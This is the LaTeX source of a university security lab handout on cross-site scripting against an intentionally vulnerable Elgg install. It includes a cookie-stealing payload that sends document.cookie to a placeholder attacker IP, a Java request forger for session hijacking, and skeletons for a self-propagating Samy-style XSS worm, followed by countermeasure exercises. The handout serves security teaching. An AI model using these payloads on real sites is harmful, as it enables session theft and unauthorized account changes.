\input{header}

\lhead{\bfseries SEED Labs -- Cross-Site Scripting Attack Lab}

\begin{document}

\begin{center}
{\LARGE Cross-Site Scripting (XSS) Attack Lab}
\vspace{0.1in}\\
{\Large (Web Application: Elgg)}
\end{center}
\copyrightnotice

\section{Overview}

Cross-site scripting (XSS) is a type of vulnerability commonly found
in web applications.  This vulnerability makes it possible for
attackers to inject malicious code (e.g. JavaScript programs) into victim's
web browser. Using this malicious code, the attackers can steal the
victim's credentials, such as session cookies.  The access control 
policies~(i.e., the same origin policy) employed by browsers to protect
those credentials can be bypassed by exploiting the XSS vulnerability.
Vulnerabilities of this kind can potentially lead to large-scale
attacks.

To demonstrate what attackers can do by exploiting XSS
vulnerabilities, we have set up a web application named 
{\tt Elgg} in our pre-built Ubuntu VM image.
{\tt Elgg} is a very popular open-source web application for
social network, and it has implemented a number of countermeasures 
to remedy the XSS threat. To demonstrate how XSS attacks work, we 
have commented out these countermeasures in Elgg in our installation, 
intentionally making Elgg vulnerable to XSS attacks.  
Without the countermeasures, users 
can post any arbitrary message, including JavaScript
programs, to the user profiles.  
In this lab, students need to exploit this vulnerability to 
launch an XSS attack on the modified {\tt Elgg}, in a way that is 
similar to what Samy Kamkar
did to {\tt MySpace} in 2005 through the notorious Samy worm. 
The ultimate goal of this attack is to spread an XSS worm among the users,
such that whoever views an infected user profile will be infected,
and whoever is infected will add you (i.e., the attacker) to 
his/her friend list. 



\section{Lab Environment}

\newcommand{\urlorurls}{URL }
\newcommand{\urlisorurlsare}{URL is }


%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%% Part I of the environment setup
\input{Web_Environment_PartI_Elgg}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


\vspace{0.1in}
\begin{tabular}{|l|l|l|}
\hline
URL & Description & Directory\\
\hline
\url{http://www.xsslabelgg.com} & Elgg & {\tt
/var/www/XSS/Elgg/} \\
\hline
\end{tabular}
\vspace{0.1in}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%% Part II of the environment setup
\input{Web_Environment_PartII_Elgg}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%






\paragraph{Other software.}
Some of the lab tasks require some basic familiarity with
JavaScript. Wherever necessary, we provide a sample JavaScript program
to help the students get started. To complete task 3, students may
need a utility to watch incoming requests on a particular TCP port. We
provide a C program that can be configured to listen on a particular
port and display incoming messages. The C program can be downloaded 
from the web site for this lab.


\subsection{Note for Instructors} 

This lab may be conducted in a
supervised lab environment. In such a case, the instructor may provide
the following background information to the students prior to doing
the lab:
\begin{enumerate}
  \item A brief overview of the tasks.
  \item How to use the virtual machine, Firefox web browser, and the
    {\tt LiveHTTPHeaders} extension.
  \item Basics of JavaScript and Ajax.
  \item How to use the C program that listens on a port. 
  \item How to write a Java program to send HTTP POST messages. 	
\end{enumerate}

\section{Lab Tasks}

\subsection{Task 1: Posting a Malicious Message to Display an Alert Window}

The objective of this task is to embed a JavaScript program in your 
{\tt Elgg} profile, such that when another user views your profile, 
the JavaScript program will be executed and an alert window
will be displayed. The following JavaScript program will display an alert window: 
\begin{Verbatim}
    <script>alert('XSS');</script> 
\end{Verbatim}
If you embed the above JavaScript code in your profile (e.g. in the brief
description field), then any user who views your profile will see the alert window. 

In this case, the JavaScript code is short enough to be typed into the 
short description field. If you want to run a long JavaScript, but you are limited
by the number of characters you can type in the form, you can store the 
JavaScript program in a standalone file, save it with the .js extension, and 
then refer to it using the {\tt src} attribute in the {\tt <script>} tag. 
See the following example:
\begin{Verbatim}[frame=single]
    <script type="text/javascript" 
            src="http://www.example.com/myscripts.js">
    </script>
\end{Verbatim}
In the above example, the page will fetch the JavaScript program from
\url{http://www.example.com}, which can be any web server.


\subsection{Task 2: Posting a Malicious Message to Display Cookies}

The objective of this task is to embed a JavaScript program in your 
{\tt Elgg} profile, such that when another user views your profile,
the user's cookies will be displayed in the alert window.
This can be done by adding some additional code to
the JavaScript program in the previous task:

\begin{Verbatim}
     <script>alert(document.cookie);</script> 
\end{Verbatim}


\subsection{Task 3: Stealing Cookies from the Victim's Machine}

In the previous task, the malicious JavaScript code written by 
the attacker can print out the
user's cookies, but only the user can see the cookies, not the 
attacker.  In this task, the attacker wants the JavaScript code 
to send the cookies to himself/herself.
To achieve this, the malicious JavaScript code needs to 
send an HTTP request to the attacker, with the cookies appended to 
the request.

We can do this by having the malicious JavaScript insert an {\tt $<$img$>$} tag with
its {\tt src} attribute set to the attacker's machine.  When the JavaScript inserts
the {\tt img} tag, the browser tries to load the image from the URL in
the {\tt src} field; this results in an HTTP GET request sent to the attacker's
machine. The
JavaScript given below sends the cookies to the port 5555 of the
attacker's machine, where the attacker has a TCP server listening 
to the same port. The server can print out whatever it receives. 
The TCP server program is available from the lab's web site.

{\footnotesize
\begin{Verbatim}[frame=single] 
 <script>document.write('<img src=http://attacker_IP_address:5555?c=' 
                                  + escape(document.cookie) + '   >'); 
 </script> 
\end{Verbatim}
}


\subsection{Task 4: Session Hijacking using the Stolen Cookies}

After stealing the victim's cookies, the attacker can do whatever the victim
can do to the {\tt Elgg} web server, including adding and deleting friends
on behalf of the victim, deleting the victim's post, etc. Essentially, 
the attacker has hijacked the victim's session. 
In this task, we will launch this session hijacking attack, and
write a program to add a friend on behalf of the victim. 
The attack should be launched from another virtual machine.


To add a friend for the victim, we should first find out how a legitimate 
user adds a friend in {\tt Elgg}.
More specifically, we need to figure out what are sent to the server when a user 
adds a friend. Firefox's {\tt LiveHTTPHeaders} extension can help us; it 
can display the contents of any HTTP request message sent 
from the browser. From the contents, we can identify all
the parameters in the request. A screen shot of {\tt LiveHTTPHeaders} is given in
Figure~\ref{fig:livehttptext}. The {\tt LiveHTTPHeaders} 
is already installed in the pre-built \ubuntu VM image.


Once we have understood what the HTTP request for adding friends look like, 
we can write a Java program to send out the 
same HTTP request. The {\tt Elgg} server cannot distinguish whether 
the request is sent out by the user's browser or by the attacker's
Java program. As long as we set all the parameters correctly,
and the session cookie is attached, the server will accept and process the 
project-posting HTTP request.
To simplify your task, we provide you with a sample Java program that does the 
following:

\begin{enumerate}
\item Open a connection to web server.
\item Set the necessary HTTP header information.
\item Send the request to web server.
\item Get the response from web server. 
\end{enumerate}

{\footnotesize
\begin{Verbatim}[frame=single]
import java.io.*;
import java.net.*;


public class HTTPSimpleForge {

public static void main(String[] args) throws IOException {

try {
     int responseCode;
     InputStream responseIn=null; 

     String requestDetails = "&__elgg_ts=<<correct_elgg_ts_value>>
                              &__elgg_token=<<correct_elgg_token_value>>";

	 // URL to be forged.
	 URL url = new URL ("http://www.xsslabelgg.com/action/friends/add?
	                      friend=<<friend_user_guid>>"+requestDetails);

	 // URLConnection instance is created to further parameterize a
	 // resource request past what the state members of URL instance
	 // can represent.
	 HttpURLConnection urlConn = (HttpURLConnection) url.openConnection();
	 if (urlConn instanceof HttpURLConnection) {
	 urlConn.setConnectTimeout(60000);
	 urlConn.setReadTimeout(90000);
	 }

	 // addRequestProperty method is used to add HTTP Header Information.
	 // Here we add User-Agent HTTP header to the forged HTTP packet.
	 // Add other necessary HTTP Headers yourself. Cookies should be stolen
	 // using the method in task3.
	 urlConn.addRequestProperty("User-agent","Sun JDK 1.6");

	 //HTTP Post Data which includes the information to be sent to the server.
	 String data = "name=...&guid=..";

	 // DoOutput flag of URL Connection should be set to true
	 // to send HTTP POST message.
	 urlConn.setDoOutput(true);

	 // OutputStreamWriter is used to write the HTTP POST data
	 // to the url connection.
	 OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream());
	 wr.write(data);
	 wr.flush();
	 
	 // HttpURLConnection a subclass of URLConnection is returned by
	 // url.openConnection() since the url is an http request.
	 if (urlConn instanceof HttpURLConnection) {
	    HttpURLConnection httpConn = (HttpURLConnection) urlConn;
	 
	    // Contacts the web server and gets the status code from
  	    // HTTP Response message.
	    responseCode = httpConn.getResponseCode();
	    System.out.println("Response Code = " + responseCode);
	 
	    // HTTP status code HTTP_OK means the response was
	    // received sucessfully.
	    if (responseCode == HttpURLConnection.HTTP_OK)
	      // Get the input stream from url connection object.
	      responseIn = urlConn.getInputStream();
	    // Create an instance for BufferedReader
	    // to read the response line by line.
	    BufferedReader buf_inp = new BufferedReader(
	    new InputStreamReader(responseIn));
	    String inputLine;
	    while((inputLine = buf_inp.readLine())!=null) {
	       System.out.println(inputLine);
            }
	 }
   } catch (MalformedURLException e) {
        e.printStackTrace();
   }
}
}
\end{Verbatim}
}

If you have trouble understanding the above program, 
we suggest you to read the following:

\begin{itemize}
\item JDK 6 Documentation: \url{http://java.sun.com/javase/6/docs/api/}
\item Java Protocol Handler:\\ 
\url{http://java.sun.com/developer/onlineTraining/protocolhandlers/}
\end{itemize}

\paragraph{Note 1:} {\tt Elgg} uses two parameters {\tt \_\_elgg\_ts} and
{\tt \_\_elgg\_token} as a countermeasure to defeat another related 
attack~(Cross Site Request Forgery). Make sure that you set these 
parameters correctly for your attack to succeed.

\paragraph{Note 2:} The attack should be launched from a 
different virtual machine; you should make the relevant changes to the 
attacker VM's {\tt /etc/hosts} file, so your 
{\tt Elgg} server's IP address points to the victim's machine's IP address,
instead of the localhost (in our default setting).


\subsection{Task 5: Writing an XSS Worm}

In this and next task, we will perform an attack similar to what Samy did 
to MySpace in 2005 (i.e. the Samy Worm). First, we will write an XSS 
worm that does not self-propagate; in the next task, we will make it 
self-propagating.
From the previous task, we have learned how to steal the cookies from the victim 
and then forge---from the attacker's machine---HTTP requests using the stolen cookies.
In this task, we need to write a malicious JavaScript program that forges HTTP requests 
directly from the victim's browser, without the intervention of 
the attacker.  The objective of the attack is to modify the victim's 
profile and add Samy as a friend to the victim. We have already created a
user called Samy on the {\tt Elgg} server (the user name is {\tt samy}).


\paragraph{Guideline 1: Using Ajax.} The malicious JavaScript should be able to 
send an HTTP request to the {\tt Elgg} server, asking it to modify
the current user's profile. There are two common types of HTTP requests, 
one is HTTP {\tt GET} request,
and the other is HTTP {\tt POST} request. These two types of HTTP requests
differ in how they send the contents of the request to the server. 
In {\tt Elgg}, the request for modifying profile uses HTTP {\tt POST}
request. We can use the {\tt XMLHttpRequest} object to send 
HTTP {\tt GET} and {\tt POST} requests to web applications. 

To learn how to use {\tt XMLHttpRequest}, you can 
study these cited documents~\cite{ajaxnoobs,ajaxpostit}. 
If you are not familiar with JavaScript programming, we 
suggest that you read ~\cite{javascripttutorial} to learn some basic JavaScript
functions. You will have to use some of these functions.


\paragraph{Guideline 2: Code Skeleton.} We provide a skeleton of the JavaScript code 
that you need to write. You need to fill in all the necessary details.
When you store the final JavaScript code as a worm in the standalone file,
you need to remove all the comments, extra space, new-line characters, {\tt <script>}
and {\tt </script>}.

{\footnotesize
\begin{Verbatim}[frame=single] 
<script>
var Ajax=null;

// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
var content="name=..&description=...&guid="; // You need to fill in the
details.

// Send the HTTP POST request.
Ajax.send(content);
</script>
\end{Verbatim} 
} 


You may also need to debug your JavaScript code. 
{\tt Firebug} is a Firefox extension that helps you debug JavaScript code. 
It can point you to the precise places that contain errors. 
It is already installed in our pre-built \ubuntu VM image.
After finishing this task, change the "Content-Type" to "multipart/form-data" 
as in the original HTTP request. Repeat your attack, and describe your observation. 


\paragraph{Guideline 3: Getting the user details.} To modify the victim’s profile the
HTTP requests send from the worm should contain the victim’s {\tt username},
{\tt Guid}, {\tt \_\_elgg\_ts} and {\tt \_\_elgg\_token}. These details are present in the web page
and the worm needs to find out this information using JavaScript code.



\paragraph{Guideline 4: Be careful when dealing with an infected profile.}
Sometimes, a profile is already infected by the XSS worm, you may want to
leave them alone, instead of modifying them again. If you are not careful, 
you may end up removing the XSS worm from the profile. 


%\paragraph{Guideline 5: Testing.}
%For {\tt Elgg}, you can view others' profiles only if you are the administrator or you are 
%assigned to the same project. Test your attack under the following steps:
%
%\begin{enumerate}
%   \item Add a new project in {\tt Elgg}. Assign it to at least three persons. 
%   \item Choose one of them as the attacker and include the worm into his or her profile. 
%   \item Log on as victim A, view attacker's profile. Check if A's profile is infected. This is 
%to test if the HTTP request succeeds.
%   \item Log on as victim B, view A's profile. Check if B's profile is injected. This is to test
%if the worm can propagate itself.
%\end{enumerate}



\subsection{Task 6: Writing a Self-Propagating XSS Worm}

To become a real worm, the malicious JavaScript program should be able to propagate itself.
Namely, whenever some people view an infected profile, 
not only will their profiles be modified, the worm will also be 
propagated to their profiles, further affecting others who view these newly infected profiles.
This way, the more people view the infected profiles, the faster the worm can propagate. 
This is exactly the same mechanism used by the Samy Worm: 
within just 20 hours of its October 4, 2005 release, over one million users 
were affected, making Samy one of the fastest spreading viruses of all time.
The JavaScript code that can achieve this is called 
a {\em self-propagating cross-site scripting worm}. In this task, you need to 
implement such a worm, which infects the victim's profile and adds the user
``Samy'' as a friend.

To achieve self-propagation, when the malicious JavaScript modifies the victim's profile,
it should copy itself to the victim's profile. There are several 
approaches to achieve this, and we will discuss two common approaches:

\begin{itemize}
\item {\bf ID Approach:} If the entire JavaScript program (i.e., the worm) is 
    embedded in the infected profile, 
    to propagate the worm to another profile, the worm code can use
    DOM APIs to retrieve a copy of itself from the web page.
    An example of using DOM APIs is given below. This code
    gets a copy of itself, and display it in an alert window:

{\footnotesize
\begin{Verbatim}[frame=single]
<script id=worm>
   var strCode = document.getElementById("worm");
   alert(strCode.innerHTML);
</script>
\end{Verbatim}
}

\item {\bf Src Approach:} If the worm is included using the {\tt src} attribute in the {\tt <script>} tag,
writing self-propagating worms is much easier. 
We have discussed the {\tt src} attribute in Task 1, and an example
is giving below. The worm can simply copy the following
{\tt <script>} tag to the victim's profile, essentially
infecting the profile with the same worm.

\begin{Verbatim}
<script type="text/javascript" src="http://example.com/xss_worm.js">
</script>
\end{Verbatim} 

\end{itemize}

\paragraph{Note:} In this lab, you can try both approaches, 
but the ID approach is required, because it is more 
challenging and it does not rely on external JavaScript code.

 
\paragraph{Guideline: URL Encoding.}
All messages transmitted using HTTP over the Internet use URL Encoding, 
which converts all non-ASCII characters such as space to special code 
under the URL encoding scheme. 
In the worm code, messages sent to {\tt Elgg} 
should be encoded using URL encoding. The \texttt{escape} function
can be used to URL encode a string. An example of using the encode
function is given below.

{\footnotesize
\begin{Verbatim}[frame=single]
<script>
  var strSample = "Hello World";
  var urlEncSample = escape(strSample);
  alert(urlEncSample);
</script>
\end{Verbatim}
}

Under the URL encoding scheme 
the "+" symbol is used to denote space. In JavaScript programs, 
"+" is used for both arithmetic operations and string operations. 
To avoid this ambiguity, you may use the {\tt concat} function for string concatenation,
and avoid using addition. For the worm code in the exercise, you don't have to use additions.
If you do have to add a number (e.g a+5), you can use subtraction (e.g a-(-5)).


\subsection{Task 7: Countermeasures}

{\tt Elgg} does have a built in countermeasures to defend against the XSS attack.
We have deactivated and commented out the countermeasures to make the
attack work.
There is a custom built security plugin {\tt HTMLawed 1.8} on the Elgg web
application which on activated, validates the user input and removes the
tags from the input. This specific plugin is registered to the
{\tt “function filter\_tags”} in the \url{elgg/engine/lib/input.php} file.


To turn on the countermeasure, login to the application as admin, goto
{\tt administration} (on top menu) $\rightarrow$ {\tt plugins} (on the right panel),
andSelect {\tt security and spam} in the dropdown menu and click {\tt
filter}. You should find the {\tt HTMLawed 1.8} plugin below. 
Click on {\tt Activate} to enable the countermeasure.


In addition to the {\tt HTMLawed 1.8} security plugin in {\tt Elgg}, there is another
built-in PHP method called {\tt “htmlspecialchars()”}, which is used to encode the special
characters in the user input, such as encoding {\tt "<"} to {\tt “\&lt”}, 
{\tt ">"} to {\tt “\&gt”}, etc. Please go to
the directory \url{elgg/views/default/output} and find the function call
{\tt “htmlspecialchars”} in {\tt text.php}, {\tt tagcloud.php}, {\tt
tags.php}, {\tt access.php}, {\tt tag.php}, {\tt friendlytime.php}, 
{\tt url.php}, {\tt dropdown.php}, {\tt email.php} and
{\tt confirmlink.php} files. Uncomment the corresponding 
{\tt "htmlspecialchars"} function calls in each file. 


Once you know how to turn on these countermeasures, please do the
following:
\begin{enumerate}

\item Activate only the {\tt HTMLawed 1.8} countermeasure but not {\tt
htmlspecialchars}; visit any of the victim profiles and describe your
observations in your report. 

\item Turn on both countermeasures; visit any of the victim profiles and 
describe your observation in your report. 


%\item Please read the article~\cite{samy} by the author 
%of the Samy Worm and see how he bypassed the similar 
%countermeasures initially implemented in {\tt MySpace}. 
%Please try his approaches and see whether you can defeat the 
%{\tt Elgg}'s countermeasures.

\end{enumerate}


\paragraph{Note:} Please do not change any other code and make sure that there are no syntax
errors.




\section{Submission}

You need to submit a detailed lab report to describe what you have
done and what you have observed. Please provide details using  
{\tt LiveHTTPHeaders},  {\tt Wireshark}, and/or screenshots.
You also need to provide explanation
to the observations that are interesting or surprising.



\begin{thebibliography}{10}

\bibitem{ajaxnoobs}
\newblock AJAX for n00bs. Available at {\footnotesize \url{http://www.hunlock.com/blogs/AJAX_for_n00bs}}.

\bibitem{ajaxpostit}
\newblock AJAX POST-It Notes.
\newblock Available at {\footnotesize \url{http://www.hunlock.com/blogs/AJAX_POST-It_Notes}}.

\bibitem{javascripttutorial}
\newblock Essential Javascript -- A Javascript Tutorial.
\newblock Available at the following URL:\\
{\footnotesize \url{http://www.hunlock.com/blogs/Essential_Javascript_--_A_Javascript_Tutorial}}.

\bibitem{Javascriptstring}
\newblock The Complete Javascript Strings Reference.
\newblock Available at the following URL:\\
{\footnotesize \url{http://www.hunlock.com/blogs/The_Complete_Javascript_Strings_Reference}}.

\bibitem{samy}
\newblock Technical explanation of the MySpace Worm.
\newblock Available at the following URL: \url{http://namb.la/popular/tech.html}.

\bibitem{elgg}
\newblock Elgg Documentation. Available at URL: \url{http://docs.elgg.org/wiki/Main_Page}.

\end{thebibliography}


\begin{figure}[b]
{\footnotesize
\begin{Verbatim}[frame=single]
http://www.xsslabelgg.com/action/friends/add?friend=40&__elgg_ts=1402467511
                             &__elgg_token=80923e114f5d6c5606b7efaa389213b3

GET /action/friends/add?friend=40&__elgg_ts=1402467511
                             &__elgg_token=80923e114f5d6c5606b7efaa389213b3
HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101
Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/elgguser2
Cookie: Elgg=7pgvml3vh04m9k99qj5r7ceho4
Connection: keep-alive

HTTP/1.1 302 Found
Date: Wed, 11 Jun 2014 06:19:28 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Location: http://www.xsslabelgg.com/profile/elgguser2
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
\end{Verbatim}
}
\caption{Screenshot of {\tt LiveHTTPHeaders} Extension} 
\label{fig:livehttptext}
\end{figure}
\end{document}
